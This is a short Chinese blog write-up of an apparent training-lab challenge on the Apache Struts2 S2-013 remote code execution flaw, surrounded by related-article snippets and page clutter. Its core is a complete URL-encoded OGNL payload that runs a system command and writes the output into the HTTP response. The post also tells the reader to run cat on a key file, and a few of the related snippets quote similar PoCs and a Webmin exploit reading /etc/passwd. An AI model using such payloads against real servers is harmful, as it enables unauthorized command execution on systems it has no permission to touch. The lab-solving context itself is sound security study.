0x19.Apache Struts2远程代码执行漏洞(S2-013)

最新推荐文章于 2024-03-07 17:48:41 发布
最新推荐文章于 2024-03-07 17:48:41 发布
阅读量295 收藏
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 s2-013
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/101564426
版权

通过构造payload执行命令;

payload:%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23out.println%28%23d%29%2C%23out.close%28%29%29%7D

执行cat命令查看key.txt,找到key;

或直接使用工具进行检测;

半情调
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Vulfocus解题复现】Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 2619
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
buuctf [struts2]s2-013
qq_1873822的博客
03-16 762
漏洞简介 Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参.
s2-013远程代码执行漏洞
Stephen Wolf
11-18 943
一、漏洞描述 struts2 标签中 `<s:a>` 和 `<s:url>` 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: 1. none - 链接不包含请求的任意参数值(默认) 2. get - 链接只包含 GET 请求中的参数和其值 3. all - 链接包含 GET 和 POST 所有参数和其值...
墨者Apache Struts2远程代码执行漏洞(S2-013)复现题解
zr1213159840的博客
01-15 1382
首先查找到漏洞的相关利用信息,链接如下: https://vulhub.org/#/environments/struts2/s2-013/ 能看到poc如下: ?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStrea
Struts2 S2-013复现
ZJT6666666的博客
12-22 255
Struts2 S2-013复现
windows无法连接到打印机SHA-2代码签名补丁win7修复工具打印机连接错误0x0004005.rar
12-16
在使用Windows操作系统时,尤其是Windows 7或更早版本,可能会遇到“无法连接到打印机”的问题,这种情况通常伴随着错误代码0x00004005。此问题的根源可能涉及多种因素,包括系统兼容性、驱动程序不兼容、网络连接...
0x19.第十九课 MetaSploit对cve-2019-0708的漏洞攻击复现.pdf
06-24
0x19.第十九课 MetaSploit对cve-2019-0708的漏洞攻击复现.pdf
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
毕业设计企业网站源码-s2-052-reproducing:s2-052-再现
06-06
S2-052(CVE-2017-9805)远程代码执行漏洞 0x00 漏洞描述 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。 Struts2是一个基于MVC设计模式的...
K8_Struts2.3.1.4 s2-013 0day利用工具+动画
05-23
关于2010那洞 我就不说了 2011那个也不说了 (这两成功率 还是顶高的) s2-013 实战 鸡肋 (要不然这工具也不会丢出来了 最好你自己打个环境来测一下 免得你以为工具不能用) 触发条件 1 s2 架构 2 使用了s2的 a标签 3 includeParams=all <s:a includeParams="all">k8team</s:a> 在ie下看到的a标签 和普通html没啥区别 在firefox下会看到 使用了s2 a标签的链接源码是这样的 *.jsp;jsessionid inurl: *.jsp;jsessionid 能不能搞到 纯属看你人品了
S2-013 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 2632
前言 S2-014是对于S2-013修复不完整的造成的漏洞,会在漏洞分析中提到,所以文本的主要分析的还是S2-013 而且在分析的时候,发现参考网上资料时对于漏洞触发逻辑的一些错误 至少目前我自己是那么认为的:) 漏洞环境根据vulhub修改而来,环境地址 https://github.com/kingkaki/Struts2-Vulenv,感兴趣的师傅可以一起分析下 若有疏漏,还望多多指...
[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)
k5664524的博客
01-17 518
2.3.1.2 之前的 Apache Struts 允许远程攻击者绕过 ParameterInterceptor 类中的安全保护并执行任意命令。
360众测靶场题库之20-Apache Struts2远程代码执行漏洞(S2-013)
最新发布
zjl12344的博客
03-07 170
360众测靶场题库
struts2远程S2-013复现学习
hklearner的博客
04-02 288
S2-013复现 原理 struts2的标签中 和 都有一个 includeParams 属性,可以设置成如下值 none - URL中不包含任何参数(默认) get - 仅包含URL中的GET参数 all - 在URL中包含GET和POST参数 此时 或尝试去解析原始请求参数时,会导致OGNL表达式的执行 影响版本:Struts 2.0.0-2.3.14 漏洞搭建 Struts2 的标签<s:a>和<s:url>提供了一个 includeParams 属性。该属性的主要作用域
[struts2]s2-013 漏洞复现
satasun的博客
12-09 558
[struts2]s2-013 环境搭建 github buuctf poc Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=a
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现
JimWu的博客
09-04 1849
Apache Struts2远程代码执行漏洞(S2-013)复现 难易程度:★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理: s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL...
Apache Struts2远程代码执行漏洞(S2-013)复现
qq_36933272的博客
09-03 1731
查询原理:s:url和s:a标记都提供includeparams属性。 该属性的主要作用域是了解包含或不包含http://request参数的内容。 INCLUDEParams的允许值为: 无-在URL中不包含任何参数(默认) get-仅在URL中包含get参数 全部-在URL中同时包含get和post参数 包含精心设计的请求参数的请求可用于将任意ognl代码注入堆栈,随后用作URL或标记的请求参...
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-013)复现
weixin_42079912的博客
08-09 503
S2-013漏洞原理:struts2的标签中 < s:a > 和 < s:url > 都有一个 includeParams 属性,可以设置成值none或get或all ,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。此时< s:a > 或< s:url >尝试去解析原始请求参数时,会导致OG...
c语言如何合并addr_0x9915.bit.bit1 = addr_0x9730.bit.bit6; addr_0x9915.bit.bit2 = addr_0x9730.bit.bit7; addr_0x9915.bit.bit3 = addr_0x9730.bit.bit8;
06-09
可以使用位运算符来实现合并。 下面是一个可能的实现: ```c addr_0x9915 = ((addr_0x9730 >> 5) & 0x07) << 1; // 取addr_0x9730的bit6~bit8,右移5位,再取低三位,最后左移1位给addr_0x9915的bit1 addr_0x9915 |= ((addr_0x9730 >> 6) & 0x01) << 2; // 取addr_0x9730的bit7,右移6位,再取低一位,最后左移2位给addr_0x9915的bit2 addr_0x9915 |= ((addr_0x9730 >> 7) & 0x01) << 3; // 取addr_0x9730的bit8,右移7位,再取低一位,最后左移3位给addr_0x9915的bit3 ``` 其中,`>>` 是右移位运算符,`<<` 是左移位运算符,`&` 是按位与运算符,`|` 是按位或运算符。具体的实现方式可以根据具体情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值